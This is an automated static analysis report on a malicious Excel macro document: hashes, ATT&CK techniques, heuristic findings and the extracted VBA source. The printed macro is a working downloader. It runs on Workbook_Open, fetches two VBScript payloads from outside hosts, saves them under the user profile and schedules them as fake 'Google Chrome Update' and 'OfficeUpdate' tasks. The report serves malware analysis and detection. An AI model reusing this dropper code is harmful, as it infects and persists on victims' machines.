Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 78132071d580d02f…

MALICIOUS

Office (OOXML)

14.4 KB Created: 2018-01-04 06:59:16 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2019-01-12
MD5: 4edd901b77b576506e9396ea3edf59ce SHA-1: 04a8ae60fae237b7a8ee1c244653e66a928f3af8 SHA-256: 78132071d580d02f75a98b83a0c7412286f51e1c34584d6ce61d324c2facc94f
208 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The VBA macro executes a Workbook_Open subroutine which uses MSXML2.serverxmlhttp to download content from two URLs constructed from document properties. These downloaded contents are saved as VBScript files in the user's profile directory. Subsequently, the macro attempts to schedule these VBScript files to execute using schtasks, indicating a downloader or dropper functionality.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1978 bytes
SHA-256: fe7fedcb22a5c07ebe652ee5634d6fc7f2326688883dc69bb8659a7e4dd7dfa7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Openn
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Module1"
Public Function Openn()
Dim xmlhttp, myurl, myurl2 As String
Dim Titi, Aut
Set xmlhttp = CreateObject("MSXML2.serverxmlhttp")
Titi = ActiveWorkbook.BuiltinDocumentProperties("Title")
Aut = ActiveWorkbook.BuiltinDocumentProperties("Author")
myurl = Aut & Titi + ".cc/zzttzz"
xmlhttp.Open "GET", myurl, False
xmlhttp.Send
Total = xmlhttp.responsetext
' second file
myurl2 = Aut & Titi + ".cc/ccddc"
xmlhttp.Open "GET", myurl2, False
xmlhttp.Send
Total2 = xmlhttp.responsetext
Dim Fileout As Object
Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    SPath = Environ("USERPROFILE") & "\Users.v" & "bs"
    sPath2 = Environ("USERPROFILE") & "\Profile.vb" + "s"
    Set Fileout = fso.CreateTextFile(SPath, True, True)
    Fileout.Write Total
    Fileout.Close
    Set Fileout = fso.CreateTextFile(sPath2, True, True)
    Fileout.Write Total2
    Fileout.Close
    Ora_X = TimeValue("" & Hour(Now) & ":" & Minute(Now) + 1 & ":" & Second(Now))
PKill2 = "Schtasks /Create /SC ONCE /ST " & Ora_X & " /TN ""Google Chrome Update"" /TR " & sPath2 & " /F"
PKill = "Schtasks /Create /SC minute /mo 10 /TN ""OfficeUpdate"" /TR " & SPath & " /F"
Shell (PKill2)
Shell (PKill)
End Function


Attribute VB_Name = "Module2"

Attribute VB_Name = "Module3"
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 19456 bytes
SHA-256: 2bccf4fc8ec07916b292ec407b5a67e617957bfa3e14ae6d180214abb0614938